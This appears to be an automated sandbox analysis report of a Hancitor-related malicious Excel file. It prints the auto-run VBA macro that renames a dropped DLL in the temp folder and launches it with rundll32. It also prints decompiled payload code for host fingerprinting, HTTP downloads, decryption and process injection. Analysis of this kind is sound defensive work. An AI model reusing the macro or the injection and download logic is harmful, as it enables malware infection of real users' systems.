                                                • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, Author: Joe Security
                                                Reputation: high

                                                General

                                                Start time: 16:10:59
                                                Start date: 22/07/2021
                                                Path: C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit): true
                                                Commandline: C:\Windows\System32\svchost.exe
                                                Imagebase: 0xb30000
                                                File size: 20992 bytes
                                                MD5 hash: 54A47F6B5E09A77E61649109C6A08866
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ficker_Stealer_1, Description: Yara detected Ficker Stealer, Source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, Author: Joe Security
                                                Reputation: moderate

                                                Disassembly

                                                Code Analysis

                                                Call Graph

                                                Graph

                                                • Entrypoint
                                                • Decryption Function
                                                • Executed
                                                • Not Executed
                                                Call graph (node id, function, API calls counted in that function):
                                                2    nam
                                                15   Search         Name:1, Clear:1
                                                96   Workbook_Open  Len:1, vbNullString:2, Select:1, Dir:1
                                                181  xxx
                                                Edges: 15->15, 96->2, 96->181, 181->15

                                                Module: Module1

                                                Declaration
                                                Line  Content
                                                1     Attribute VB_Name = "Module1"

                                                Executed Functions

                                                APIs      Meta Information
                                                Environ$

                                                Strings   Decrypted Strings
                                                "temp"

                                                Line  Instruction                                        Meta Information
                                                3     Sub nam(pafs As String)
                                                4     Name pafs As Environ$("temp") & "\" & "omsh.dll"   Environ$; executed
                                                5     End Sub

                                                APIs        Meta Information
                                                SubFolders  Part of subcall function Search@Module1: SubFolders
                                                Files       Part of subcall function Search@Module1: Files
                                                Name        Part of subcall function Search@Module1: Name
                                                Clear       Part of subcall function Search@Module1: Clear

                                                Strings    Decrypted Strings
                                                "532.dll"
                                                "532.dll"

                                                Line  Instruction                                  Meta Information
                                                10    Sub Search(mds As Object, pafs As String)
                                                11    Dim Nedc As Object                           executed
                                                14    For Each Nedc In mds.SubFolders              SubFolders
                                                15    Search Nedc, pafs
                                                16    Next Nedc                                    SubFolders
                                                17    Dim Ters As Object
                                                18    For Each Ters In mds.Files                   Files
                                                20    If Ters.Name = "532.dll" Then                Name
                                                22    pafs = Ters
                                                23    End If
                                                24    Next Ters                                    Files
                                                25    Exit Sub
                                                25    ErrHandle:
                                                28    Err.Clear                                    Clear
                                                29    End Sub

                                                Module: Sheet1

                                                Declaration
                                                Line  Content
                                                1     Attribute VB_Name = "Sheet1"
                                                2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                3     Attribute VB_GlobalNameSpace = False
                                                4     Attribute VB_Creatable = False
                                                5     Attribute VB_PredeclaredId = True
                                                6     Attribute VB_Exposed = True
                                                7     Attribute VB_TemplateDerived = False
                                                8     Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line | Content
1 | Attribute VB_Name = "ThisWorkbook"
2 | Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3 | Attribute VB_GlobalNameSpace = False
4 | Attribute VB_Creatable = False
5 | Attribute VB_PredeclaredId = True
6 | Attribute VB_Exposed = True
7 | Attribute VB_TemplateDerived = False
8 | Attribute VB_Customizable = True
9 | Option Compare Text
10 | Option Explicit
11 | Dim Ioes as String
12 | Private Declare PtrSafe Function fffz Lib "shell32" Alias "ShellExecuteA"(ByVal hwnd as Long, ByVal lpOperation as String, ByVal lpFile as String, ByVal lpParameters as String, ByVal lpDirectory as String, ByVal nShowCmd as Long) as Long

Executed Functions

APIs | Meta Information
Environ$ |
Dir |
Select |
Copy |
Part of subcall function xxx@ThisWorkbook: Environ$ |
Part of subcall function xxx@ThisWorkbook: GetFolder |
Len | Len("C:\Users\Albus\AppData\Local\Temp\532.dll") -> 41
Part of subcall function nam@Module1: Environ$ |
shell32!ShellExecuteA | shell32!ShellExecuteA(0,"","rundll32","C:\Users\Albus\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB","",1)
vbNullString |
Environ$ |

Strings | Decrypted Strings
"temp"
"texmp"
""""
".exe"
"Object 20"
"rundl""l32"
"temp"
"Object 20"
".exe"
"rundl""l32"
"temp"
".exe"
"rundl""l32"
"temp"
Line | Instruction | Meta Information
17 | Private Sub Workbook_Open() |
21 | Dim vcbc as String |
executed
22 | vcbc = Environ$("temp") | Environ$
23 | Dim xc |
24 | xc = "texmp" |
25 | If Dir(vcbc & "\omsh.dll") = "" Then | Dir
27 | ActiveSheet.Shapes.Range(Array("Object 20")).Select | Select
28 | Selection.Copy | Copy
31 | Call xxx() |
33 | If Len(Ioes) > 2 Then | Len("C:\Users\Albus\AppData\Local\Temp\532.dll") -> 41
executed
35 | Call nam(Ioes) |
37 | Dim ued as String |
38 | ued = ".exe" |
41 | fffz 0, vbNullString, "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB", vbNullString, 1 | shell32!ShellExecuteA(0,"","rundll32","C:\Users\Albus\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB","",1); vbNullString; Environ$
executed
44 | Endif |
45 | Endif |
46 | End Sub |

APIs | Meta Information
Environ$ |
Part of subcall function Search@Module1: SubFolders |
Part of subcall function Search@Module1: Files |
Part of subcall function Search@Module1: Name |
Part of subcall function Search@Module1: Clear |
GetFolder |

Strings | Decrypted Strings
"temp"

Line | Instruction | Meta Information
49 | Sub xxx() |
50 | Dim usx |
executed
52 | usx = Environ$("temp") | Environ$
55 | Dim asdaf as FileSystemObject |
57 | Set asdaf = New Scripting.FileSystemObject |
60 | Call Search(asdaf.GetFolder(usx), Ioes) | GetFolder
62 | End Sub |

Execution Graph

Execution Coverage: 7.9%
Dynamic/Decrypted Code Coverage: 77.6%
Signature Coverage: 10.5%
Total number of Nodes: 1155
Total number of Limit Nodes: 11

Graph

34c707 __crtGetStringTypeA_stat 41 API calls 9498->9499 9499->9506 9501->9502 9503 353f7d GetStringTypeW 9502->9503 9504 353f8e 9502->9504 9502->9506 9503->9504 9507 34b3b0 9504->9507 9506->9492 9508 34b3b8 9507->9508 9509 34b3c9 9507->9509 9508->9509 9510 34c707 __crtGetStringTypeA_stat 41 API calls 9508->9510 9509->9506 9510->9509 9512 355e44 9511->9512 9514 355e3f 9511->9514 9513 355a94 __tzset_nolock 48 API calls 9512->9513 9513->9514 9515 34b083 __crtGetStringTypeA_stat 5 API calls 9514->9515 9516 353fbe 9515->9516 9516->9496 9516->9506 9517 355e5a 9516->9517 9521 355e98 _strlen 9517->9521 9527 355f22 9517->9527 9518 34b083 __crtGetStringTypeA_stat 5 API calls 9519 353fdf 9518->9519 9519->9496 9519->9506 9520 34d262 _malloc 41 API calls 9522 355efa _memset __alloca_probe_16 9520->9522 9521->9520 9521->9522 9521->9527 9523 355f8e 9522->9523 9525 355f76 WideCharToMultiByte 9522->9525 9526 355f93 9522->9526 9522->9527 9524 34b3b0 __freea 41 API calls 9523->9524 9524->9527 9525->9523 9526->9523 9528 34ffb0 __calloc_crt 41 API calls 9526->9528 9527->9518 9529 355fba 9528->9529 9529->9523 9530 34c707 __crtGetStringTypeA_stat 41 API calls 9529->9530 9530->9523 9532 354ecd LCMapStringW 9531->9532 9533 354ee8 9531->9533 9532->9533 9534 354ef0 GetLastError 9532->9534 9535 3550e5 9533->9535 9546 354f42 9533->9546 9534->9533 9536 355e13 ___ansicp 49 API calls 9535->9536 9537 35510d 9536->9537 9540 355126 9537->9540 9541 355201 LCMapStringA 9537->9541 9550 3550dc 9537->9550 9538 34b083 __crtGetStringTypeA_stat 5 API calls 9539 34e2d5 9538->9539 9539->9475 9542 355e5a ___convertcp 42 API calls 9540->9542 9543 35515d 9541->9543 9552 355138 9542->9552 9544 355228 9543->9544 9545 34c707 __crtGetStringTypeA_stat 41 API calls 9543->9545 9548 34c707 __crtGetStringTypeA_stat 41 API calls 9544->9548 9544->9550 9545->9544 9547 34d262 _malloc 41 API calls 9546->9547 9546->9550 9555 354fa1 __alloca_probe_16 9546->9555 9547->9555 9548->9550 9549 35501b 9551 34b3b0 __freea 41 API calls 
9549->9551 9550->9538 9551->9550 9552->9543 9552->9550 9553 34d262 _malloc 41 API calls 9552->9553 9557 355175 _memset __alloca_probe_16 9552->9557 9553->9557 9554 355093 LCMapStringW 9559 3550cd 9554->9559 9560 3550ab WideCharToMultiByte 9554->9560 9555->9549 9555->9550 9556 34d262 _malloc 41 API calls 9555->9556 9561 35505f __alloca_probe_16 9555->9561 9556->9561 9557->9543 9558 3551cf 9557->9558 9562 355e5a ___convertcp 42 API calls 9557->9562 9564 34b3b0 __freea 41 API calls 9558->9564 9563 34b3b0 __freea 41 API calls 9559->9563 9560->9559 9561->9549 9561->9554 9562->9558 9563->9549 9564->9543 9566->9400 9570 355b78 9567->9570 9571 34b3cb _LocaleUpdate::_LocaleUpdate 43 API calls 9570->9571 9572 355b89 9571->9572 9572->9329 9574 354a01 9573->9574 9575 34e825 __encode_pointer 2 API calls 9574->9575 9576 354a19 9574->9576 9575->9574 9576->8952 9580 34c22b 9577->9580 9579 34c270 9579->8954 9581 34c237 ___DllMainCRTStartup 9580->9581 9588 351493 9581->9588 9587 34c258 ___DllMainCRTStartup 9587->9579 9589 352f42 __lock 41 API calls 9588->9589 9590 34c23c 9589->9590 9591 34c14f 9590->9591 9592 34e891 __decode_pointer GetModuleHandleA 9591->9592 9593 34c15f 9592->9593 9594 34e891 __decode_pointer GetModuleHandleA 9593->9594 9595 34c170 9594->9595 9596 34c1ea 9595->9596 9609 351f0d 9595->9609 9606 34c261 9596->9606 9598 34c18a 9601 34c1ac 9598->9601 9605 34c1d5 9598->9605 9622 34fff8 9598->9622 9599 34e825 __encode_pointer 2 API calls 9599->9596 9601->9596 9602 34fff8 __realloc_crt 47 API calls 9601->9602 9603 34c1c3 9601->9603 9602->9603 9603->9596 9604 34e825 __encode_pointer 2 API calls 9603->9604 9604->9605 9605->9599 9671 35149c 9606->9671 9610 351f19 ___DllMainCRTStartup 9609->9610 9611 351f46 9610->9611 9612 351f29 9610->9612 9614 351f87 RtlSizeHeap 9611->9614 9617 352f42 __lock 41 API calls 9611->9617 9613 34d16a _wcsftime_l_stat 41 API calls 9612->9613 9616 351f2e 9613->9616 9615 351f3e ___DllMainCRTStartup 9614->9615 9615->9598 9619 34d10b _wcsftime_l_stat 
GetModuleHandleA 9616->9619 9618 351f56 ___sbh_find_block 9617->9618 9627 351fa7 9618->9627 9619->9615 9624 34fffc 9622->9624 9625 35003e 9624->9625 9626 35001f Sleep 9624->9626 9631 355419 9624->9631 9625->9601 9626->9624 9630 352e6a RtlLeaveCriticalSection 9627->9630 9629 351f82 9629->9614 9629->9615 9630->9629 9632 355425 ___DllMainCRTStartup 9631->9632 9633 35542c 9632->9633 9634 35543a 9632->9634 9635 34d262 _malloc 41 API calls 9633->9635 9636 355441 9634->9636 9637 35544d 9634->9637 9653 355434 _realloc ___DllMainCRTStartup 9635->9653 9638 34c707 __crtGetStringTypeA_stat 41 API calls 9636->9638 9646 3555bf 9637->9646 9666 35545a ___sbh_resize_block ___sbh_find_block 9637->9666 9638->9653 9639 3555f2 9641 351412 _realloc GetModuleHandleA 9639->9641 9640 3555c4 RtlReAllocateHeap 9640->9646 9640->9653 9643 3555f8 9641->9643 9642 352f42 __lock 41 API calls 9642->9666 9644 34d16a _wcsftime_l_stat 41 API calls 9643->9644 9644->9653 9645 355616 9648 34d16a _wcsftime_l_stat 41 API calls 9645->9648 9645->9653 9646->9639 9646->9640 9646->9645 9647 351412 _realloc GetModuleHandleA 9646->9647 9650 35560c 9646->9650 9647->9646 9649 35561f GetLastError 9648->9649 9649->9653 9652 34d16a _wcsftime_l_stat 41 API calls 9650->9652 9655 35558d 9652->9655 9653->9624 9654 3554e5 RtlAllocateHeap 9654->9666 9655->9653 9657 355592 GetLastError 9655->9657 9656 35553a RtlReAllocateHeap 9656->9666 9657->9653 9658 35378f ___sbh_alloc_block 5 API calls 9658->9666 9659 3555a5 9659->9653 9661 34d16a _wcsftime_l_stat 41 API calls 9659->9661 9660 351412 _realloc GetModuleHandleA 9660->9666 9663 3555b2 9661->9663 9662 352fe6 HeapFree ___sbh_free_block 9662->9666 9663->9649 9663->9653 9664 355588 9665 34d16a _wcsftime_l_stat 41 API calls 9664->9665 9665->9655 9666->9639 9666->9642 9666->9653 9666->9654 9666->9656 9666->9658 9666->9659 9666->9660 9666->9662 9666->9664 9667 35555d 9666->9667 9670 352e6a RtlLeaveCriticalSection 9667->9670 9669 355564 9669->9666 9670->9669 9674 352e6a 
RtlLeaveCriticalSection 9671->9674 9673 34c266 9673->9587 9674->9673 9676 3515ee ___DllMainCRTStartup 9675->9676 9677 352f42 __lock 41 API calls 9676->9677 9678 3515f5 9677->9678 9679 351631 _doexit 9678->9679 9681 34e891 __decode_pointer GetModuleHandleA 9678->9681 9689 35169b 9679->9689 9683 351624 9681->9683 9685 34e891 __decode_pointer GetModuleHandleA 9683->9685 9684 351698 ___DllMainCRTStartup 9684->8962 9685->9679 9687 35168f 9688 35147e _malloc 2 API calls 9687->9688 9688->9684 9690 3516a1 9689->9690 9691 35167c 9689->9691 9694 352e6a RtlLeaveCriticalSection 9690->9694 9691->9684 9693 352e6a RtlLeaveCriticalSection 9691->9693 9693->9687 9694->9691 9696 355307 ___DllMainCRTStartup 9695->9696 9697 35531f 9696->9697 9701 35533e _memset 9696->9701 9698 34d16a _wcsftime_l_stat 40 API calls 9697->9698 9699 355324 9698->9699 9702 34d10b _wcsftime_l_stat GetModuleHandleA 9699->9702 9700 3553b0 RtlAllocateHeap 9700->9701 9701->9700 9703 351412 _realloc GetModuleHandleA 9701->9703 9704 352f42 __lock 40 API calls 9701->9704 9705 355334 ___DllMainCRTStartup 9701->9705 9706 35378f ___sbh_alloc_block 5 API calls 9701->9706 9708 3553f7 9701->9708 9702->9705 9703->9701 9704->9701 9705->8971 9706->9701 9711 352e6a RtlLeaveCriticalSection 9708->9711 9710 3553fe 9710->9701 9711->9710 9712->8980 9716 352e6a RtlLeaveCriticalSection 9713->9716 9715 34ea16 9715->8986 9716->9715 9718 3532c5 9717->9718 9719 353023 9717->9719 9718->8999 9719->9718 9720 35328a HeapFree 9719->9720 9720->9718 9724 352e6a RtlLeaveCriticalSection 9721->9724 9723 34c764 9723->8988 9724->9723 9726 34eabf ___DllMainCRTStartup 9725->9726 9727 34ead7 9726->9727 9728 34c707 __crtGetStringTypeA_stat 41 API calls 9726->9728 9730 34ebb3 ___DllMainCRTStartup 9726->9730 9729 34eae5 9727->9729 9731 34c707 __crtGetStringTypeA_stat 41 API calls 9727->9731 9728->9727 9732 34eaf3 9729->9732 9734 34c707 __crtGetStringTypeA_stat 41 API calls 9729->9734 9730->9007 9731->9729 9733 34eb01 9732->9733 9735 34c707 
__crtGetStringTypeA_stat 41 API calls 9732->9735 9736 34eb0f 9733->9736 9737 34c707 __crtGetStringTypeA_stat 41 API calls 9733->9737 9734->9732 9735->9733 9738 34eb1d 9736->9738 9739 34c707 __crtGetStringTypeA_stat 41 API calls 9736->9739 9737->9736 9740 34eb2e 9738->9740 9742 34c707 __crtGetStringTypeA_stat 41 API calls 9738->9742 9739->9738 9741 352f42 __lock 41 API calls 9740->9741 9743 34eb36 9741->9743 9742->9740 9744 34eb42 InterlockedDecrement 9743->9744 9750 34eb5b 9743->9750 9745 34eb4d 9744->9745 9744->9750 9748 34c707 __crtGetStringTypeA_stat 41 API calls 9745->9748 9745->9750 9748->9750 9749 352f42 __lock 41 API calls 9755 34eb6f ___removelocaleref 9749->9755 9757 34ebbf 9750->9757 9751 34eba0 9760 34ebcb 9751->9760 9754 34c707 __crtGetStringTypeA_stat 41 API calls 9754->9730 9755->9751 9756 34c795 ___freetlocinfo 41 API calls 9755->9756 9756->9751 9763 352e6a RtlLeaveCriticalSection 9757->9763 9759 34eb68 9759->9749 9764 352e6a RtlLeaveCriticalSection 9760->9764 9762 34ebad 9762->9754 9763->9759 9764->9762 8364 3419e0 8365 3419ec 8364->8365 8366 3419f1 8364->8366 8368 341870 8365->8368 8382 341390 8368->8382 8371 341390 2 API calls 8372 341895 8371->8372 8373 341390 2 API calls 8372->8373 8379 3418a5 8373->8379 8374 34197a 8374->8366 8376 34195a Sleep 8423 3415c0 8376->8423 8379->8374 8379->8376 8387 341aa0 8379->8387 8412 341630 8379->8412 8429 3414e0 8379->8429 8383 3413a7 8382->8383 8384 34139c GetProcessHeap 8382->8384 8385 3413c5 8383->8385 8386 3413b0 RtlAllocateHeap 8383->8386 8384->8383 8385->8371 8386->8385 8434 341420 8387->8434 8400 341b69 8403 3425b0 10 API calls 8400->8403 8401 341b2a 8467 3425b0 8401->8467 8405 341b88 wsprintfA 8403->8405 8406 341ba6 8405->8406 8407 341390 2 API calls 8406->8407 8411 341bb9 8406->8411 8407->8411 8408 341c4a 8408->8379 8411->8408 8473 3428d0 8411->8473 8493 342660 8411->8493 8413 34164f 8412->8413 8422 341648 8412->8422 8414 341685 8413->8414 8415 3416a0 8413->8415 8416 3416dc 8413->8416 8417 3416bf 
8413->8417 8413->8422 8582 341ef0 8414->8582 8591 341f60 8415->8591 8573 341e80 8416->8573 8600 341e00 8417->8600 8422->8379 8424 3415cf 8423->8424 8425 34161e Sleep 8424->8425 8427 341630 56 API calls 8424->8427 8719 341740 8424->8719 8723 341980 8424->8723 8425->8379 8427->8424 8431 3414ed 8429->8431 8430 34154c 8430->8379 8431->8430 8432 341390 2 API calls 8431->8432 8433 341513 lstrcpyA 8432->8433 8433->8430 8435 341434 GetVersion 8434->8435 8436 342630 8435->8436 8437 342640 8436->8437 8439 341abb 8436->8439 8497 341c70 8437->8497 8440 3430f0 GetComputerNameA 8439->8440 8441 343124 lstrcatA 8440->8441 8442 343135 lstrcatA 8440->8442 8441->8442 8510 342df0 8442->8510 8445 343157 lstrcatA 8446 341acd 8445->8446 8447 342520 8446->8447 8448 342537 lstrcpyA 8447->8448 8449 34254d 8447->8449 8450 341ad9 8448->8450 8539 341fe0 8449->8539 8455 3423c0 DsEnumerateDomainTrustsA 8450->8455 8453 34258a lstrcpyA 8453->8450 8454 34256a lstrcpyA 8454->8450 8456 3423f2 8455->8456 8457 341ae8 8455->8457 8456->8457 8458 342429 lstrcatA lstrcatA 8456->8458 8459 34245b lstrcatA lstrcatA 8456->8459 8460 343400 8457->8460 8458->8456 8459->8456 8461 3414a0 8460->8461 8462 343413 GetModuleHandleA 8461->8462 8463 34342e GetProcAddress 8462->8463 8464 341b21 8462->8464 8465 343446 GetNativeSystemInfo 8463->8465 8466 34344f GetSystemInfo 8463->8466 8464->8400 8464->8401 8465->8464 8466->8464 8468 3425c4 8467->8468 8472 341b49 wsprintfA 8467->8472 8469 341390 2 API calls 8468->8469 8470 3425dd 8469->8470 8561 342cd0 CryptAcquireContextA 8470->8561 8472->8406 8474 3414a0 8473->8474 8475 3428e6 lstrlenA 8474->8475 8476 342958 InternetCrackUrlA 8475->8476 8477 34294b lstrlenA 8475->8477 8478 342975 8476->8478 8479 34296e 8476->8479 8477->8476 8478->8479 8480 3424f0 InternetOpenA 8478->8480 8479->8411 8481 34299a 8480->8481 8481->8479 8482 3429cb InternetConnectA 8481->8482 8482->8479 8483 3429fb HttpOpenRequestA 8482->8483 8484 342a29 InternetCloseHandle 8483->8484 8485 342a3a 8483->8485 
8484->8479 8486 342a40 InternetQueryOptionA InternetSetOptionA 8485->8486 8487 342a79 HttpSendRequestA 8485->8487 8486->8487 8488 342aa4 HttpQueryInfoA 8487->8488 8489 342b0f InternetCloseHandle InternetCloseHandle 8487->8489 8488->8489 8490 342acd 8488->8490 8489->8479 8490->8489 8491 342ad3 InternetReadFile 8490->8491 8492 342af0 8491->8492 8492->8489 8494 34266c 8493->8494 8496 342684 8493->8496 8495 3425b0 10 API calls 8494->8495 8494->8496 8495->8496 8496->8411 8498 341390 2 API calls 8497->8498 8499 341c8e 8498->8499 8504 3413d0 8499->8504 8503 341d15 8503->8439 8505 3413dc HeapFree 8504->8505 8506 3413ef 8504->8506 8505->8506 8507 342490 GetWindowsDirectoryA 8506->8507 8508 3424b4 GetVolumeInformationA 8507->8508 8509 3424e5 8507->8509 8508->8509 8509->8503 8517 342e90 8510->8517 8515 342e84 8515->8445 8515->8446 8516 342e4c lstrcpyA lstrcatA lstrcatA 8516->8515 8518 341420 8517->8518 8519 342e9d K32EnumProcesses 8518->8519 8520 342e03 8519->8520 8522 342ebb 8519->8522 8523 343000 OpenProcess 8520->8523 8522->8520 8534 342f30 OpenProcess 8522->8534 8524 343027 OpenProcessToken 8523->8524 8533 342e45 8523->8533 8525 343045 GetTokenInformation 8524->8525 8524->8533 8526 343064 GetLastError 8525->8526 8525->8533 8527 343073 8526->8527 8526->8533 8528 341390 2 API calls 8527->8528 8529 34307c GetTokenInformation 8528->8529 8530 3430ab LookupAccountSidA 8529->8530 8531 3430d1 8529->8531 8530->8531 8532 3413d0 HeapFree 8531->8532 8532->8533 8533->8515 8533->8516 8535 342f57 K32GetProcessImageFileNameA CloseHandle 8534->8535 8536 342feb 8534->8536 8535->8536 8537 342f7f 8535->8537 8536->8522 8537->8536 8538 342fd6 lstrcpyA 8537->8538 8538->8536 8556 3414a0 8539->8556 8542 34205d 8543 342056 8542->8543 8558 3424f0 8542->8558 8543->8453 8543->8454 8546 3420b3 InternetConnectA 8546->8543 8547 3420e3 HttpOpenRequestA 8546->8547 8548 342111 InternetCloseHandle 8547->8548 8549 342122 8547->8549 8548->8543 8550 342160 HttpSendRequestA HttpQueryInfoA 8549->8550 8551 342128 
InternetQueryOptionA InternetSetOptionA 8549->8551 8552 342204 InternetCloseHandle InternetCloseHandle 8550->8552 8555 3421a2 8550->8555 8551->8550 8552->8543 8553 3421ba InternetReadFile 8554 342200 8553->8554 8553->8555 8554->8552 8555->8552 8555->8553 8555->8554 8557 3414ac InternetCrackUrlA 8556->8557 8557->8542 8557->8543 8559 342082 8558->8559 8560 3424fc InternetOpenA 8558->8560 8559->8543 8559->8546 8560->8559 8562 342d12 8561->8562 8563 342d1c CryptCreateHash 8561->8563 8566 342da6 CryptDestroyHash 8562->8566 8567 342db7 8562->8567 8563->8562 8564 342d3b CryptHashData 8563->8564 8564->8562 8565 342d57 CryptDeriveKey 8564->8565 8565->8562 8568 342d7a CryptDecrypt 8565->8568 8566->8567 8569 342dbd CryptDestroyKey 8567->8569 8570 342dce 8567->8570 8568->8562 8569->8570 8571 342dd4 CryptReleaseContext 8570->8571 8572 342de7 8570->8572 8571->8572 8572->8472 8574 341390 2 API calls 8573->8574 8575 341e96 8574->8575 8609 342230 8575->8609 8577 341eba 8578 341ecf 8577->8578 8619 342b80 8577->8619 8580 3413d0 HeapFree 8578->8580 8581 341ee2 8580->8581 8581->8422 8583 341390 2 API calls 8582->8583 8584 341f06 8583->8584 8585 342230 16 API calls 8584->8585 8586 341f2a 8585->8586 8587 341f3f 8586->8587 8661 343b30 GetTempPathA GetTempFileNameA 8586->8661 8589 3413d0 HeapFree 8587->8589 8590 341f52 8589->8590 8590->8422 8592 341390 2 API calls 8591->8592 8593 341f76 8592->8593 8594 342230 16 API calls 8593->8594 8595 341f9a 8594->8595 8596 341fb7 8595->8596 8679 343880 8595->8679 8598 3413d0 HeapFree 8596->8598 8599 341fca 8598->8599 8599->8422 8601 341390 2 API calls 8600->8601 8602 341e16 8601->8602 8603 342230 16 API calls 8602->8603 8604 341e3a 8603->8604 8605 341e55 8604->8605 8694 343730 8604->8694 8606 3413d0 HeapFree 8605->8606 8608 341e68 8606->8608 8608->8422 8610 342242 8609->8610 8611 341fe0 12 API calls 8610->8611 8617 3422e0 8610->8617 8612 342262 8611->8612 8614 34226a 8612->8614 8612->8617 8613 341fe0 12 API calls 8613->8617 8615 342299 8614->8615 8632 
341d40 8614->8632 8615->8577 8617->8613 8617->8615 8618 341d40 4 API calls 8617->8618 8618->8617 8620 342b96 8619->8620 8621 342b9d 8620->8621 8639 342c40 8620->8639 8621->8578 8626 342c08 8628 342c0e TerminateProcess 8626->8628 8629 342c1a CloseHandle CloseHandle 8626->8629 8628->8629 8629->8621 8631 342bfb GetProcessId 8631->8626 8633 341390 2 API calls 8632->8633 8635 341d4f RtlDecompressBuffer 8633->8635 8636 341dc2 8635->8636 8637 3413d0 HeapFree 8636->8637 8638 341ddf 8637->8638 8638->8615 8640 3414a0 8639->8640 8641 342c56 GetEnvironmentVariableA lstrcatA CreateProcessA 8640->8641 8642 342bb1 8641->8642 8642->8621 8643 343270 8642->8643 8644 3432a9 VirtualAllocEx 8643->8644 8645 3432cb VirtualAllocEx 8644->8645 8649 3432eb 8644->8649 8645->8649 8646 341390 2 API calls 8646->8649 8647 34338b 8650 342bd6 8647->8650 8651 34339a VirtualFreeEx 8647->8651 8648 3413d0 HeapFree 8648->8647 8649->8644 8649->8646 8652 34334f WriteProcessMemory 8649->8652 8653 3432f1 8649->8653 8650->8626 8654 3437e0 8650->8654 8651->8650 8652->8649 8652->8653 8653->8647 8653->8648 8655 3414a0 8654->8655 8656 343806 GetThreadContext 8655->8656 8657 343822 WriteProcessMemory 8656->8657 8658 342bf3 8656->8658 8657->8658 8659 343846 SetThreadContext 8657->8659 8658->8626 8658->8631 8659->8658 8660 343868 ResumeThread 8659->8660 8660->8658 8669 343ac0 8661->8669 8663 343b7a 8664 343bc6 8663->8664 8665 343b97 wsprintfA 8663->8665 8668 343bbf 8663->8668 8667 3436c0 3 API calls 8664->8667 8674 3436c0 8665->8674 8667->8668 8668->8587 8670 343b1e 8669->8670 8671 343aca 8669->8671 8670->8663 8671->8670 8672 343ad0 CreateFileA 8671->8672 8672->8670 8673 343af5 WriteFile CloseHandle 8672->8673 8673->8670 8675 3414a0 8674->8675 8676 3436da CreateProcessA 8675->8676 8677 343705 CloseHandle CloseHandle 8676->8677 8678 343701 8676->8678 8677->8678 8678->8668 8680 343890 8679->8680 8681 34391d VirtualAlloc 8679->8681 8683 342c40 3 API calls 8680->8683 8682 343939 8681->8682 8686 3438a4 8681->8686 
8682->8686 8687 343953 CreateThread 8682->8687 8684 34389d 8683->8684 8685 3438ab VirtualAllocEx 8684->8685 8684->8686 8685->8686 8688 3438cb WriteProcessMemory 8685->8688 8686->8596 8687->8686 8689 343973 CloseHandle 8687->8689 8692 3439e0 8687->8692 8688->8686 8690 3438e7 CreateRemoteThread 8688->8690 8689->8686 8690->8686 8691 34390a CloseHandle 8690->8691 8691->8686 8693 3439ed 8692->8693 8695 34373f 8694->8695 8701 343746 8695->8701 8703 343180 8695->8703 8700 34377c CreateThread 8700->8701 8702 34379c CloseHandle 8700->8702 8717 3439a0 8700->8717 8701->8605 8702->8701 8704 3431b2 VirtualAlloc 8703->8704 8705 3431d0 VirtualAlloc 8704->8705 8709 3431ec 8704->8709 8705->8709 8706 3431f2 8707 343263 8706->8707 8708 343252 VirtualFree 8706->8708 8707->8701 8710 343580 8707->8710 8708->8707 8709->8704 8709->8706 8716 3435bb 8710->8716 8711 343601 8711->8700 8711->8701 8712 3435c8 GetModuleHandleA 8713 3435ee LoadLibraryA 8712->8713 8712->8716 8713->8716 8714 343653 GetProcAddress 8714->8716 8715 34366e GetProcAddress 8715->8716 8716->8711 8716->8712 8716->8714 8716->8715 8718 3439cf 8717->8718 8720 341750 8719->8720 8721 341773 8719->8721 8720->8424 8721->8720 8722 3413d0 HeapFree 8721->8722 8722->8720 8724 3419a0 8723->8724 8725 341990 8723->8725 8724->8424 8726 3413d0 HeapFree 8725->8726 8726->8724

                                                  Executed Functions

                                                  Control-flow Graph

                                                  C-Code - Quality: 89%
                                                  			E00341FE0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
                                                  				void* _v8;
                                                  				long _v12;
                                                  				void* _v16;
                                                  				signed short _v20;
                                                  				signed int _v24;
                                                  				void _v28;
                                                  				void _v32;
                                                  				void* _v36;
                                                  				long _v40;
                                                  				long _v44;
                                                  				int _v48;
                                                  				intOrPtr _v60;
                                                  				char* _v64;
                                                  				signed short _v84;
                                                  				intOrPtr _v88;
                                                  				char* _v92;
                                                  				long _v96;
                                                  				void* _v108;
                                                  				char _v368;
                                                  				char _v628;
                                                  				int _t79;
                                                  				void* _t80;
                                                  				void* _t83;
                                                  				int _t97;
                                                  				void* _t141;
                                                  
                                                  				E003414A0( &_v108, 0, 0x3c);
                                                  				_v108 = 0x3c;
                                                  				_v92 =  &_v368;
                                                  				_v88 = 0x104;
                                                  				_v64 =  &_v628;
                                                  				_v60 = 0x104;
                                                  				 *((char*)(_t141 + 0xfffffffffffffe94)) = 0;
                                                  				 *((char*)(_t141 + 0xfffffffffffffd90)) = 0;
                                                  				_t79 = InternetCrackUrlA(_a4, 0, 0,  &_v108); // executed
                                                  				if(_t79 != 0) {
                                                  					if(_v96 == 0) {
                                                  						_v96 = 3;
                                                  					}
                                                  					if(_v96 == 3 || _v96 == 4) {
                                                  						_t80 = E003424F0(); // executed
                                                  						_v36 = _t80;
                                                  						if(_v36 != 0) {
                                                  							_v20 = _v84;
                                                  							_v24 = 0x84080100;
                                                  							if(_v96 == 4) {
                                                  								_v24 = _v24 | 0x00803000;
                                                  							}
                                                  							_t83 = InternetConnectA(_v36,  &_v368, _v20 & 0x0000ffff, 0, 0, 3, 0, 1); // executed
                                                  							_v16 = _t83;
                                                  							if(_v16 != 0) {
                                                  								_v8 = HttpOpenRequestA(_v16, "GET",  &_v628, 0, 0, 0x347050, _v24, 1);
                                                  								if(_v8 != 0) {
                                                  									if(_v96 == 4) {
                                                  										_v40 = 4;
                                                  										InternetQueryOptionA(_v8, 0x1f,  &_v28,  &_v40);
